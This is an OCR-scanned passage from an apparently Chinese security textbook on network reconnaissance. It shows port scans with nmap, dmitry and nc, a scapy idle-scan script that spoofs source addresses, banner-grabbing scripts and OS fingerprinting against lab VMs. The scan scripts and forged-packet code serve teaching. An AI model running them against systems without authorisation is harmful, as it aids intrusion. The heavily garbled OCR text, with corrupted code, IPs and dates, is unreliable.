如 下 图 所 示 。 


GOTERIUI# TMap -ST L92168.1.103 -p 135, 445,555 
tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 22:27 EDT| 
map scan report for 192.168.1.193 

ost is up (6.999485 latency). 


ORT 。 STATE 
35/tcp open msrpc 

45/tcp open microsoft-ds 

55/tcp closed dsf 

C Address: 00:0C:29:A2:4E:07 (VMware) 


SERVICE 


map done: 1 IP address (1 host up) scanned in 6.13 seconds 


[step 园 如 果 没 有 提供 端口 ， 默 认 情 况 下 
Nmap 会 自动 扫描 1000 个 常用 端口 ， 如 下 图 
所 示 。 


FootGRati5-# nnap -sT 192.168.1. 1 
Er Nmap 7.79 ( https://nmap.org ) at 2918-19-26 22:31 EDT| 
map scan report for 192.168.1.193 

ost is up (9.9925s Latency) . 

ot shown: 996 closed ports 

ORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

45/tcp open microsoft-ds 

869/tcp open icslap 

后 Address: 69:6C:29:A2:4E:97 (VMware) 

mm 


ap done: 1 IP address (1 host up) scanned in 1.39 seconds 


侈 提示 : 通过 Nmap -sT -IL addrtxt -p 80 命 
令 ， 可 以 对 导入 文件 中 的 地 址 进行 扫描 。 
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(3) dmitry 工具 。dmitry 工具 的 功能 简 
单 ， 使 用 起 来 不 用 配置 太 多 参数 ， 默 认 150 
个 常用 端口 。 使 用 dmitry 工具 进行 扫描 的 
操作 步骤 如 下 : 

[step 图 输入 dmitry 命 令 ， 可 以 查看 该 工具 的 
参数 信息 ， 执 行 效果 如 下 图 所 示 。 


ooToratLr FonTtry 
peepmagic Infornation Gathering Tool 
There be sone deep magic going on” 


Usage: dnitry LI-winsepfb] 1-t 9-9] 1-o shost.txt] host 
-9 Save output to Ahost.txt or to file specified by -0 file 
1 Perforn a whols looxup on the IP address of a hest 

Perform a whols ooxup on the dowaln name of a host 

Retrieve Netcraft.com information on a host 

Perform a search for possible 5ubdomains 

Perform a search for possible emall addresses 

Perform a TCP port scan on a host 

PerTorm a TCP port scan on a host showing output reporting filtered port 

Read in the banner received from the scanned port 

+ 9-9 Set the TTL ln seconds when scanning a TCP port ( pefautt 2 ) 

PRequires the -p flagged to be passed 


使 用 dmitry -p 192.168.1.103 命 令 ， 实 
现 常用 150 个 端口 的 扫描 ， 如 下 图 所 示 。 


Footarali -# omitry -p 192.168-1.163 
Deepnagic Information Gathering Tool 
"There be sone deep magic going on" 


ERROR: Unable to locate Host Name for 192.168.1.193 
Continuing with limited nodules 
HostIP:192.168.1.193 

HostNane 


(Sathered TCP port information for 192.168.1.193 


Port. Srare 
33/tcp open 
139/tcp open 


Portscan Finished: Scanned 156 ports, 147 ports were in state closed 


All scans conpleted, exiting 


(4) nc 工具 。nc 工具 也 有 一 个 扫描 的 
功能 ， 使 用 nc -nv -wl -z 192.168.1.103 1-1000 
命令 可 以 对 指定 端口 区 间 进 行 扫描 ，nc 扫 
描 的 结果 除 给 出 端口 外 ， 还 给 出 了 可 能 使 
用 的 服务 名 称 ， 如 下 图 所 示 。 


Foot@kali:~# nc -nv -wl -z 192.168.1.103 1-1060 
(UNKNOWN) [192.168.1.193] 445 (microsoft-ds) ope 
(UNKNOWN) [192.168.1.193] 139 (netbios-ssn) open 
(UNKNOWN) [192.168.1.193] 135 (loc-srv) open 


在 扫描 命令 中 ，-nv 表 示 后 面 给 出 的 是 
一 段 IP 地 址 ， 不 做 域名 解析 ; -wl 是 设置 超 
时 时 间 1s; -z 是 进行 扫描 。 

nc 还 可 以 写成 脚本 的 形式 ， 具 体 代码 
如 下 : 


撮 循 环 取出 139-200 的 端口 进行 扫描 最 后 过 滤 出 
open 状 态 的 端口 

for x in $(seq 139 200) ;do nc -nv -w 
1 -z 192.168.1.103 $x;done | grep open 
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还 可 以 写成 扫描 IP 地 址 段 ， 具 体 代码 
如 下 : 
坦 循环 取出 1-254, 扫描 该 区 段 IP 指 定 端口 


for x in $(seq 1 254);do nc -nv -w 1 
-z 192.168.1.$x 80;done 


3. 中 间 人 扫描 


中 间 人 扫描 (也 称 为 僵尸 扫描 〉 扫描 
方式 极度 隐蔽 ， 但 是 实施 条 件 苛刻 。 首 先 
扫描 方 允许 伪造 源 地 址 ， 其 次 需要 有 一 台 
中 间 人 机 器 。 中 间 人 机 器 需要 具备 如 下 两 
个 条 件 : 

第 1 条 : 在 网 络 中 是 一 个 闲置 的 状态 ， 
没有 三 层 网 络 传输 。 

第 2 条 : 系统 使 用 的 IPID 必 须 为 递增 形 
式 的 才 可 以 ， 不 同 的 操作 系统 IPID 是 不 同 
的 ， 如 有 的 是 随机 数 。IPID 是 IP 协 议 中 的 
Identification 字 段 ， 如 下 图 所 示 。 


FTnterneE ProtocoT Version 4, Sre: 192.168.1.168, Dst: 106-128-166-1985 
9108 4 


= ength: 28 byte 
» Differentiated Services ae 9, Ves (Ddcp: cse, on: Not-EcT) 
TILE 
， Dt onent IPID 
Tine to live: 
Protocoly Yep 18) 
Header checksun: 0x03c1 [validation disabled] 
[Header checksun status: Unverified] 
Source; 102,168.1,100 
Destination; 106,120,166,105 


中 间 人 扫描 实现 的 原理 ， 如 果 需 要 分 
解 成 步 又， 可 以 分 为 如 下 几 个 步 又 : 
[step 图 扫描 者 向 中 间 人 机 器 发 送 一 个 SYN/ 
ACK 数 据 包 ， 此 时 中 间 人 机 器 会 回复 一 个 
RST 数 据 包 。 这 个 RST 数 据 包 中 便 包 含 IPID 
值 ， 记 录 IPID 值 。 
[step 图 扫描 者 向 目标 主机 发 送 SYN 数 据 包 。 
此 时 SYN 中 的 源 地 址 为 伪造 地 址 (中 间 人 
机 器 地 址 ) ， 如 果 目 标 主机 端口 开放 便 会 
向 中 间 人 机 器 发 送 SYN/ACK 数 据 包 ， 中 间 


人 机 器 会 给 目标 机 回复 RST 数 据 包 ， 此 时 
IPID+1 进 行 递增 。 
如 果 目 标 主 机 端口 没有 开放 ， 目 标 主 


会 给 中 间 人 机 器 发 送 RST 数 据 包 ， 中间人 
不 予 回应 ，IPID 保 持 不 变 。 
step 图 扫描 者 再 次 向 中 间 人 机 器 发 送 SYN/ 
ACK 数 据 包 ， 等 待 回复 RST 数 据 包 以 获取 
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IPID 值 。 拿 到 这 个 IPID 值 进行 比 对 ， 如 果 
IPID 值 为 IPID+2， 则 证 明 目 标 主机 端口 开 
放 ， 否 则 目标 主机 端口 未 开放 。 

(1) scapy 工具 。 使 用 scapy 实现 中 间 
人 扫描 。 首 先 需 要 对 中 间 人 主机 检验 ， 具 
体操 作 步 又 如 下 : 
[step 图 构建 发 送 给 中 间 人 的 数据 包 ， 如 下 图 
所 而。 


> I=IPT 
->> t=TCP() 
>> rm=(i/t) 
> rm[IP] .dst =“192.168.1.193” 
rm[TCP].fLags = 'S， 
> srl(rm).display() 
Begin emission: 
.Finished sending 1 packets. 


Received 2 packets, got 1 answers, remaining © packets 


查看 返回 数据 包 中 的 IPID 值 ， 如 下 图 
所 示 。 
Pa#[ IP J### [TCF JHH# 
sport= http 
dport= ftp data 
seq= 0 
ack= 1 
dataofs= 5 
reserved= 0 
flags= RA 
window= 9 
chksum= 9x2b4f 
urgptr= 0 
1.193 options= [] 
65 101  ###[ Padding ]### 
\options\ load= ' FHEPF 


再 次 发 送 相同 数据 包 给 中 间 人 机 器 ， 
查看 数据 包 中 IPID 值 ， 如 下 图 所 示 。 如 果 
此 时 IPID 值 为 递增 ， 并 且 两 个 数据 包 前 后 
数值 差 1， 这 个 中 间 人 机 器 才 符 合 扫描 要 
求 ， 否 则 无 法 判断 。 


PAT TP HF 有 [TCF 和 
version= 4 sport= http 
ihl= 5 dport= ftp_data 
tos= gxg IPID seq= 0 
len= 49 ack= 1 
dataofs= 5 

395= reserved= 0 
frag= 9 flags= RA 
ttl= 128 window= 9 
proto= tcp chksum= 9x2b4f 
chksum= 9xa555 urgptr= 0 


Src= 192.168.1.103 options= [] 

dst= 192.165.1.191 #4##[ Padding ]### 
_ \options\ Load \s02\NOA\ABS\ sha\ BIN\ sy | 

有 了 中 间 人 机 器 后 便 可 以 实施 扫描 ， 

具体 操作 步骤 如 下 : 
[Eee 国 构建 发 送 给 目标 机 的 数据 包 ， 如 下 图 
所 示 。 这 里 使 用 send 发 送 不 查看 返回 数据 ， 
目标 地 址 是 要 扫描 的 主机 地 址 ， 源 地 址 需 
要 设置 成 中 间 人 地 址 。 


IITPU 

=TCP() 

rd=(i/t) 

rd[IP].dst = "192.168.1.1" 
rd[IP].src = "192.168,1.193' 
rd[TCP].flLags = '5* 


step 图 先 给 中 间 人 机 器 发 送 一 个 SYN 数 据 
包 ， 记 录 下 IPID 值 ， 如 下 图 所 示 。 接 着 使 


用 send(rd) 命 令 ， 将 数据 包 发 送出 去 ， 使 用 
send 发 送 不 查看 返回 数据 。 
P>> Srl(rm) .disptay() 
Begin emission: 
Finished sending 1 packets. 
+ 
Received 1 packets, got 1 answers, remaining 9 packets 
Hi#[ IP ] 并 ### #4#[ TCP ]### 
version= 4 
ihl= 5 
tos= Ox0 
len= 40 
id= 4476 dataofs= 5 
flags= reserved= 9 
frag= 0 flags= RA 
ttl= 128 window= 9 
proto= tcp chksum= Ox2b4f 
chksum= 9xa537 urgptr= 9 
src= 192.168.1.193 options= [ 
dst= 192.168.1.101 ###[ Padding ]### 
\options\ load= '\x01\x01\x98\n\x60\x90" 


再 次 快速 给 中 间 人 机 器 发 送 一 个 SYN 
数据 包 ， 查 看 IPID 值 ， 如 下 图 所 示 。 通 过 
比较 两 个 IPID 值 ， 如 果 相 差 为 2， 证 明 目 标 
主机 端口 开放 。 

>>> SrI(rm).,display() 


egin emission: 
Finished sending 1 packets. 
ke 


eceived 1 packets, got 1 answers, remaining © packets 
E##[ EP ]### ###[ TCP ]### 

version= 4 sport= http 

ihl= 5 dport= ftp_data 

9xe seq= 0 
49 Back= 1 
dataofs= 
的 reserv 
9 flags= RA 
128 


proto= tcp 9x2b4f 
chksum= 9xa535 urgptr= 9 
2.168.1.103 options= [] 
2.168.1.191 ###[ Padding ]### 
ons\ Load= '\x90\x90 DBD， 


下 面 给 出 一 段 自动 化 测试 代码 ， 有 具体 
代码 如 下 : 
#!/usr/bin/python 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
坦 定 义 一 个 函数 用 于 测试 中 间 人 主机 是 否 合格 
def ipid(mid) : 
replyl = srl(IP(dst = mid)/TCP (fags = 
'S') ,timeout=2,verbose=0) 。 间 发 送 SYN 数 据 包 
send(IP(dst = mid)/TCP (fags="SRA')， 
# 发 送 SYN/RCK 数 据 包 


Verbose=0) 
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reply2 = srl(IP(dst = mid)V/TCP (fags = 
"S") ,timeout=2,verbose=0)# 再 次 发 送 SYN 数 据 包 
if reply2[IP].id == (replyl[IP]. 
id+2): # 判 断 两 次 SYN 数 据 包 返 回 包 是 否 差 值 为 2 
print "IPID meet a criterion™ 
提 如 果 差 值 为 2, 符合 要 求 ， 询 问 是 否 扫描 
response = raw input ("start 
scanning (YT or Nye 
if response == 'Y': 
## 输 入 Y 进 入 扫描 ， 需 输入 一 个 目标 机 IP 地 址 
target = raw input("Enter the IP 
Destination host address: ") 
midscan (target,mid) # 调 用 扫描 函数 
else: # 不 符合 要 求 做 出 提示 
print"Does not meet the requirements,cannot 
be used as an intermediary machine" 
## 定 义 用 于 扫描 的 函数 
def midscan (target,mid) : 
print "\nScanning target" + target 
+ "with mid" + mid # 打 印 出 一 些 提示 信息 
print, 本 着 一 一 一 一 一 一 一 一 一 一 二 Open Ports on 


for port in range(100,200) : 
# 循 环 遍历 100-200 的 端口 
Urs # 给 中 间 人 发 送 一 个 数据 包 
start val = srl(IP(dst=mid)/TCP (fl 
ags="'SA',dport=port) ,timeout=2, verbose=0) 
# 给 目标 机 发 送 一 个 伪造 数据 包 
send(IP (src=mid,dst=target)/TCP( 
flags="'S',dport=port),verbose=0) 
# 再 给 中 间 人 发 送 数 据 包 
end val = srl(IP(dst=mid) /TCP (fa 
gs='SA'),timeout=2,verbose=0) 
if end_val[IP].id == 
val[IP]+2) :  ## 判 断 两 次 ITPID 值 是 否 为 2 
print port # 符 合 要 求 打印 出 端口 
except: 
pass # 不 符合 要 求 直接 pass 
# 脚 本 主体 部 分 先 打 印 提示 信息 


Print"= --Mid Scan Suite- 


(start_ 


_\n" 
print"l1 - Identify Mid Host\n" 
print"2 - Perform Mid Scan\n" 

ans = raw_ input ("Select an Option (1 


人 

if ans == "1': # 选 项 1 测试 中 间 人 机 器 ， 输 
入 一 个 IP 地 址 

mid = raw input("Enter IP address 


to test IPID sequence: ") 


ipid(mid) 。 # 调 用 中 间 人 测试 函数 

else: 

if ans == '2':  # 选 项 2 直接 扫描 ， 输 入 中 
间 人 IP 地 址 以 及 扫描 主机 IP 地 址 


mid = raw input ("Enter IP adderss 
for Mid System: ") 
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target = raw input ("Enter IP adderss 
for Scan target: ") 


# 调 用 扫描 函数 


(2) Nmap 工具 。Namp 工具 提供 了 中 
间 人 这 种 扫描 方式 ， 当 然 前 提 是 中 间 人 机 
器 符合 要 求 ， 再 进行 扫描 。 具 体操 作 步 又 
如 下 : 
Eee 加 使 用 Nmap -p139 192.168.1.103 
-script=ipidseq.nse 命 令 ， 检 验 中 间 人 机 
器 是 否 符 合 要 求 ， 如 下 图 所 示 。 它 的 
判断 依据 仍然 是 IPID 是 不 是 一 个 增 量 
(Incremental) 。 


midscan(target,mid) 


FaatgKaUI'-7TESEIPorE nmap -p139 197-168 .1.103 -script=ipidseq.nse 
Starting Nmap 7,70 ( https://nmap.org ) at 2918-10-27 92:52 EDT 
map scan report for 192.168.1.103 

ost is up (0.00036s latency|. 

PORT 。 STATE SERVICE 

139/tcp open netbios-ssn 

AC Address: 99:6C:29:A2:4E:97 (VMware) 


lost script results; 
| _ipidseq: Increnental! 


map done: 1 IP address (1 host up) scanned in 9.61 seconds 


Estee 加 使 用 Nmap 192.168.1.1 -sI 192. 
168.1.104 -Pn -p 1-100 命 令 进行 中 间 人 扫 
描 ， 第 一 个 IP 是 需要 扫描 的 目标 机 器 ， 第 二 
个 IP 是 中 间 人 主机 ，-sI 指 定 的 参数 便 是 中 
间 人 ， 如 下 图 所 示 。 


FaatHKSUIS=7TEST7TPOFE TSP I92-168 1-1 ST I92-168- 1 HY -Pn -p I- L160 
Starting Nmap 7.70 ( https://nmap.org ) ar 2818-19-27 @3:07 EDT 

lidle scan using zonbie 192.168.1.104 (192.166.1.104:80); Class: Incremente\ 
map scan report for 192.168,1.1 

st 1s up (9.0285 Latency). 

ot shown: 99 closed|filtered ports 

PoRT ”STATE SERVICE 

/tcp open http 

IAC Address: 1C:FA:68:81:2F:08 (Tp-link Technologies) 


map done: 1 IP address (1 host up) scanned in 2.24 seconds 


11.2 ”扫描 主机 其 他 信息 


通过 端口 扫描 确定 端口 后 ， 根 据 不 同 
端口 判断 目标 主机 可 能 存在 哪些 服务 ， 从 
而 识别 目标 操作 系统 ， 为 后 续 的 防范 工作 
做 准备 。 


11.2.1 扫描 banner 信 息 


通过 banner 信 息 可 以 识别 目标 主机 的 软 
件 开 发 商 、 软 件 名 称 、 服 务 类 型 、 版 本 号 
等 信息 。 不 过 ， 这 个 banner 信 息 可 修改 ， 因 
此 识别 并 不 是 很 准确 ， 获 取 banner 信 息 必须 
要 与 目标 主机 建立 连接 。 
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1. python 脚 本 


使 用 python 脚 本 获取 banner 信 息 ， 有 具体 
代码 如 下 : 


import socket # 导 入 一 个 用 于 网 络 编程 的 库 

banner=socket.socket (socket.AF_ 
INET, socket .SOCK_STREAM) # 创 建 连 接 

banner.connect (("192.168.1.105",21)) 
# 使 用 connect 建 立 关联 

banner.recv (1024)# 使 用 recv 函 数 接收 数据 

"220 (VSETPQ 2.3.4)\r\n’ 

# 返 回 的 banner 信息 

banner.close ()# 使 用 完 对 象 后 记得 关闭 

exit () # 退 出 python 环 境 


;二 4 二 全 一 
运行 脚本 执行 效果 ， 如 下 图 所 示 。 

FaatBKGUIS-7Test7portg- Python 

Python 2.7.15+ (default, Aug 31 2618，11;56:52) 

[6Gcc 8.2.8] on linux2 

Type "hetp"，"copyright*，"credits” or "license" for more information 

p>> import socket 

>>> banner=socket.socker(sacket.AF_TNET,socket .SOCK_STREAM) 

p>> banner.connect(("192.168.1.165",21)) 

>> banner. recv (1924) 

"228 (vsFTPd 2.3,3)Nrvm' 


>>> banner.ctosel) 
P>> exit() 


在 实际 环境 中 很 多 机 器 是 不 允许 获取 
banner 信 息 的 ， 如 果 是 这 样 ，recv 函 数 会 
被 挂 起 ， 一 直 等 待 返回 。 下 面 给 出 一 段 脚 
本 ， 可 以 避免 recv 函 数 被 挂 起 ， 有 具体 代码 
如 下 : 


#!/usr/bin/python#python 脚 本 默认 格式 
import socket # 导 入 socket 库 
import select # 导 入 select 库 
import sys # 导 入 sys 库 
if lenl(sys.argv) !=4: 
# 判 断 输入 参数 如 果 不 等 于 4, 打印 出 提示 信息 
Print "Usage -./banner_greab .py 
[Target IP] [First Port] [Last Port]" 
print "Example ./banner greab.py 
192.168.1.1 100 200" 
print "Example will grab banners for 
TCP ports 100 through 200 on 192.168.1.1" 
sys.exit() 
ip = sys.argv[1] # 获 取 IP 地 址 
start = int(sys.argv[2])# 获 取 起 始 端口 号 
end = int(sys.argv[3]) # 获 取 结 束 端口 号 
for port in range (Startvend) : 
# 循 环 获取 端口 
try:  ## 创 建 TCP 连 接 
bangrab = socket.socket (socket . 
AF_INET, socket.-SOCK STRERAM) 
bangrab -connect ( (ip,port)) 
# 以 相应 的 端口 建立 连接 
ready = select.select([bangrab], 


[],[],1) # 获 取 返 回信 息 ， 超 时 时 间 1s 


if ready[0]: 
坦 如 果 返 回信 息 不 为 空 , 将 信息 打印 
print "™ TCP Port" + str(port) 
+"'."'+bangrab.recv(1024) 


bangrab.close() 关闭 对 象 
except: 
pass ”# 如 果 超 时 ,就 继续 下 一 个 端口 


执行 脚本 效果 如 下 图 所 示 。 


UI Tost/ Service# .ban_ grab.py 192.168.1.165 1 566 | 
TCP Port21.226 (vsFTPd 2.3.4) 


TCP Port22.55H-2.0-OpensSH_ 4.7p1 Debian-8ubuntul 


TCP Port23.0000 dob#00' 
TCP Port25.220 metasploitable.localdonain ESMTP postfix (Ubuntu) 


2. dmitry 工 具 


使 用 dmitry 工 具 可 以 获取 banner 信 息 ， 
执行 dmitry -pb 192.168.1.105 命 令 ， 即 可 获 
取 banner 信 息 ， 如 下 图 所 示 。 


TerEd TCP POTt ITTOTIISTIOT TO T97-T68-T-T95 


1/tcp open 
> 229 (vsFTPd 2.3.4) 


2/tcp open 
> SSH-2.0-0pensSH 4.7p1 Debian-8ubuntul 


3/tcp open 
> bob Wozdd' 

5/tcp open 

> 22B metasplottable. localdonain ESMTP Postfix (Ubuntu) 


3/tcp open 


ortscan Finished; Scanned 159 ports, 144 ports were in state closed 


3. Nmap 工 具 


Nmap 工 具 提 供 了 很 多 已 经 写 好 的 脚 
本 ， 从 而 进行 banner 信 息 的 扫描 ， 具 体操 作 
步骤 如 下 : 
执行 Nmap -sT 192.168.1.105 -p22- 
-Script=bannernse 命 令 ， 可 以 获取 目标 主 
机 22 端 口 的 banner 人 信息， 执行 效果 如 下 图 
所 示 。 


UI Test Ser vicen map -5T 192. 160"1.105 -p22 -script=banner.nsd 


tarting Nnap 7.79 ( https://nnap.org ) at 2018-10-27 95:21 EDT 
map scan report for 192.168.1.105 

ost is up (0.09043s latency). 

ORT 。 STATE SERVICE 

22/tcp open ssh 

|_banner: SSH-2.0-0penSSH 4.7p1 Debian-Bubuntul 

IAC Address: 99:9c:29:FA:DD:2A (Vmware) 


Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds 


[step 图 使 用 Nmap 192.168.1.105 -p 1-100 -sV 
命令 ，-sV 参 数 表 明 使 用 特征 扫描 ， 基 于 特 
征 扫描 会 显示 出 更 多 的 信息 ， 执 行 效果 如 
下 图 所 示 。 
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ts at https://omap.org/subnity 


倍 提 示 : 通过 banner 信 息 可 以 获取 端口 对 
应 什么 服务 ， 该 信息 量 少 而 且 不 够 准确 ， 
而 使 用 Nmap 工 具 提供 的 特征 扫描 ， 可 以 打 
描 出 更 多 的 信息 。 


4.amap 工 具 


amap 是 首 款 针对 渗透 测试 人 员 的 扫描 
工具 ， 它 会 识别 在 端口 上 运行 的 应 用 程序 ， 
还 可 以 通过 发 送 触 发 数据 包 并 在 响应 字符 串 
列表 中 查找 响应 ， 来 识别 基于 非 ASCII 编 码 
的 应 用 程序 。 使 用 语法 格式 如 下 : 


amapcrap [-S] [-u] [-m 0ab] [-M 
min, max] [-n connections] [-N delay] 
[-w delay] [-e] [-v] TARGET PORT 


使 用 amap 工 具 进 行 扫描 的 操作 步骤 
如 下 : 
使 用 amap -b 192.168.1.105 22 命 令 ， 
可 以 获取 banner 信 息 ， 如 下 图 所 示 。 


Footekali: /Test/Service# anap -6 192.168.1.165 22 
amap v5.4 (www.thc.org/thc-anap) started at 2018-19-27 95:31: 
3 - APPLICATION MAPPING mode 


Protocol on 192.168.1.195:22/tcp matches ssh - banner: SSH-2. 
+openssH_ 4.7p1 Debian-8ubuntul\nprotocol mismatch.\n 

Protocol on 192.168.1.195:22/tcp matches ssh-openssh - banner: 
SSH-2.9-0penSSH 4.7p1 Debian-8ubuntul\nProtocol mismatch.\n 

Unidentified ports: none. 


amap v5.4 finished at 2918-16-27_ 05:32:04 


侈 提示 : 使 用 amap -b 192.168.1.105 1-100 
命令 ， 可 以 扫描 区 段 端口 。 


[see 国 amap 提 供 了 基于 特征 的 扫描 ， 直 接 使 
用 amap 192.168.1.105 1-100-q 命 令 ， 可 以 进 
行 基于 特征 的 扫描 ， 并 给 出 比较 详细 的 信 
息 ， 如 下 图 所 示 。 


Fava 7 Te TS 1-100 
jeap V5.4 (vw. thc.org/the-anap) started at 2018-10-27 85:53:29 ~ APPLICATION HAPPING mod 


Protocol on 192.168.1.185:53/tcp natches dns 
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step 图 在 基于 特征 扫描 的 过 程 中 ， 如 果 加 入 
b 参 数 ， 会 使 扫描 结果 更 加 精确 ， 扫 描 结果 
产 下 同 世 二 


OTA nap 32 1581193 1-109 “5 
ap (ume, The“ org/ the map] Started at 2018 19-27 96:00:83 ~ APPLICATION NAPPING node 


rorocot on 192, 168.1,195:21/tep matches ttp - banner: 228 (vsFTPpd 2.3. 
SNFN 


Please togtn| 


An 192.168.1.1853:22/tcp matches ssh-opens 


SH-2.8-0pensSH 4.7p1 Det 


I 
rotocol on 192.168,1.195:25/tcp matches smtp - banner: 228 netasploitable. localdonain ESHTP 
po on 


0 vetasploitable. Localdonnin Erp 
Ross 
ed 


11.2.2 探索 主机 操作 系统 


操作 系统 安装 完成 后 总 会 默认 打开 一 
些 端口 ， 针 对 这 些 默 认 端 口 可 以 判断 出 一 
个 系统 的 类 型 ， 当 然 操作 系统 的 识别 种 类 
繁多 ， 更 多 的 是 采用 多 种 技术 组 合 比较 来 
进行 确认 。 


1. 主动 式 扫描 的 一 些 方法 


首先 通过 主动 扫描 收集 信息 ， 然 后 将 
收集 的 信息 进行 特征 比 对 ， 由 此 推断 出 操 
作 系 统 类 型 的 方式 。 

(1) python 工具 。 基 于 TTL 值 进行 扫 
描 的 方式 ， 根 据 不 同 操作 系统 TTL 值 不 同 
的 特征 来 进行 判断 。Windows 默认 TIL 值 
是 128 (65 ~ 128) ，Linux/Unix 默认 TIL 
值 是 64 (1 一 64) ， 也 有 某 些 Unix 默认 
TIL 值 是 255。 基 于 TTL 值 进 行 判断 的 脚 
本 ， 有 具体 内 容 如 下 : 


#!/usr/bin/python 
from scapy.all import* 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
import sys 
if len(sys.argv) !=2: 
print "Usage ./ttl os.py [Target IP]" 
Print "Example ./ttl] os.py 192.168. 


bd 
print "Example will perform tl1l 
analysis to attempt to determine wheter 
the system is windows or Linux/Unix " 
sys.exit() 


ip=sys.argv[1] # 获 取 IP 地 址 
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ans=srl (IP(dst=str (ip))/ICcMP(), 
timeout=1l,verbose=0)## 发 送 ICMP 数 据 包 

if ans -== None:# 如 果 没 有 回复 信息 ,做 出 提示 

print "NO response was returned " 

elif int(ans[IP] .ttl)<=64:# 如 果 TTL 值 
小 于 64, 提 示 Linux/Unix 系 统 

print "Host is Linux/Unix" 

else: # 都 不 是 提示 Windows 系 统 

print "Host is Windows" 

使 用 python 脚 本 识别 系统 ， 执 行 脚本 两 
次 ， 分 别 扫描 Linux 系 统 与 Windows 系 统 ， 
执行 效果 如 下 图 所 示 。 
rootG@Kkati:-/Test/Service# ./ttl 05.py 192.168.1I.165 
Host is Linux/Unix | 


Iroot@kali:~/Test/Service# ./ttL os.py 192.168.1.16: 
Host is Windows 


(2) Nmap 工具 。 使 用 Nmap 工具 来 判 
断 操 作 系 统 ， 具 体操 作 步 又 如 下 : 
使 用 Nmap 192.168.1.103 -O 命 令 来 进 
行 扫描 ， 扫 描 Windows 操 作 系 统 ， 并 且 给 出 
| 如 下 图 所 示 。 


RE 


a 2010-10-27 00:33 ED 


a 
Tt Windows 0 stra” Sp4, Wifeows Wr Sra Sr of Wndows Server” aes sre = sr2 
1 mp 


ar nrtps://mnap.org/supmity 


[pre 


step 图 使 用 Nmap 扫 描 Linux 系 统 的 信息 ， 执 
行 效果 如 下 图 所 示 。 


FT 
st 


I 
ry ) at 2018-10-27 66:38 EDT 


FA 00:2 (varey 
sse et parpost 

os ee es ini Min hernetiz.s 
bs detail 

ewere pstenees 3h 


移 提 示 : 从 扫描 出 的 信息 中 可 以 看 到 Nmap 
是 基于 CPE 信 息 来 判断 操作 系统 的 版 本 ， 
CPE 是 一 个 国际 化 、 标 准 化 组 织 ， 不 论 是 软 
件 还 硬件 ， 通 过 CPE 分 配 一 个 编号 ， 因 此 通 
过 CPE 编 号 可 以 匹配 系统 类 型 。 


(3) xprobe2 工 具 。xprobe2 是 一 个 针 
对 操作 系统 的 扫描 工具 ， 扫 描 的 结果 并 


不 是 很 准确 ， 仅 供 参考 。 具 体操 作 步 又 
如 下 : 
Eee 回 使 用 xprobe2 192.168.1.103 命 令 ， 
扫描 Windows 操 作 系 统 ， 执 行 效果 如 下 图 
所 示 。 


Fe xprobe 192-168,1.103 


‘probe? v0.3 Copyright (c) 2082-2685 fyodor@odo.ng, ofir@sys-security.com, nedergo0o.nu 


:WU (Guess probability: 31%) 


pbabiLity: 1%) 


etn sennad 


step 图 使 用 xprobe2 工 具 扫 描 Linux 系 统 ， 执 
行 效 果 如 下 图 所 示 。 


ot pr Ta TOR 1 IU 


probea v.90.3 copyright (c) 2002-2005 fyodorBogo nu，oflr8sys-5ecurlty-com，medereoeo nu 
iess probabiLity: 00%) 


probability: 100%) 


2. 被 动 式 扫描 


通过 网 络 监听 、 抓 包 的 方式 收集 信 
息 ， 结 合 ARP 地 址 欺骗 (可 以 实现 端口 镜 
像 的 效果 ) 抓 取 数据 包 可 以 识别 全 网 段 系 
统 类 型 。 

使 用 Kali 系 统 中 的 一 款 被 动 扫 描 工 
具 p0f， 可 以 进行 被 动 式 扫描 。 操 作 步 又 
如 下 : 
打开 p0f 工 具 ， 上 默认 开始 监听 eth0 网 
卡 ， 执 行 效果 如 下 图 所 示 。 


00tOKali: # Pof 
- pof 3.09b by Michal Zalewski <lcamtuf@coredump.cx> --- 
[+] Closed 1 file descriptor. 
[+] Loaded 322 signatures from '/etc/pof/pef.fp'. 
[+] Intercepting traffic on default interface 'ethe'. 
[+] Default packet filtering configured [+VLAN]. 
[+] Entered main event loop. 


[step 图 一 旦 有 数据 包 oe 
捕获 ， 通 过 捕获 的 数据 包 进 行 分 析 ， 它 

将 收集 到 的 信息 全 部 在 终端 输出 ， 信息 到 
还 是 比较 大 的 ， 这 里 只 截取 了 部 分 信息 ， 
如 下 图 所 示 。 通 过 分 析 这 些 信息 ， 可 以 探 
索 主 机 的 操作 系统 类 别 。 
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FT L925 TI0I7R 过 


-TB3-T59789 {Syn J 


= 192.158.1.161/49909 
= Linux 3.11 and never 

1disc =e 

| = none 

| raw sig = 4:64+9:0:1460:mss*29,7:mss,sok,ts,nop,ws:df,id+:0 

1 

L.-T1 i9z.168.1.161/49968 -> 61.213.183.154/89 (http request) ]- 

1 


| client = 192.168.1.161/49969 


1 app = Safari 5.1-6 

| lang = English 

| parans = dishonest 

| raw sig = 1:Host,User-Agent,Accept=[*/+],Accept-Language=[en-US,en; 


0.5],Accept-Encoding=[gzip, deflate], ?Cache-Control,Pragma=[no- cache| 
1 ,connection=[keep-alive]:Accept-Charset,Keep-Alive:Mozilla/5.9 (X11; 
Linux x85 64; rv:59.6) Gecko/29169191 Firefox/60.9 


11.2.3 扫描 SNMP 


SNMP 是 简单 网 络 管理 协议 ， 使 用 的 是 
UDP 端口 中 的 161、162 端 口 ， 其 中 ， 服 务 
端 使 用 的 是 161 端 口 ， 客 户 端 使 用 的 是 162 
端口 。 通 过 SNMP 可 以 管理 网 络 中 的 交换 
机 、 服 务 器 、 防 火 墙 等 设备 ， 从 而 查看 网 
络 中 这 些 设备 的 详细 信息 。 


1. 构建 测试 环境 

这 里 采用 虚拟 机 安装 Windows XP 操作 
系统 来 进行 测试 。 如 何 安装 Windows XP 系 
统 这 里 不 做 讲解 ， 只 讲解 如 何在 Windows 
XP 系 统 下 配置 SNMP。 

有 具体 的 操作 步骤 如 下 : 
[Sep 国 打开 控制 面板 ， 找 到 “添加 /删除 程 
序 ” 图 标 ， 如 下 图 所 示 。 


= 让/ 
EGG 添加 / 副 除 程序 


在 打开 的 “添加 或 删除 程序 ”对 话 框 
中 ， 单 击 “ 添 加 删除 Windows 组 件 ” 图 标 ， 
如 下 图 所 示 。 


CC SF) 


Wo [ET 司 


Iw 
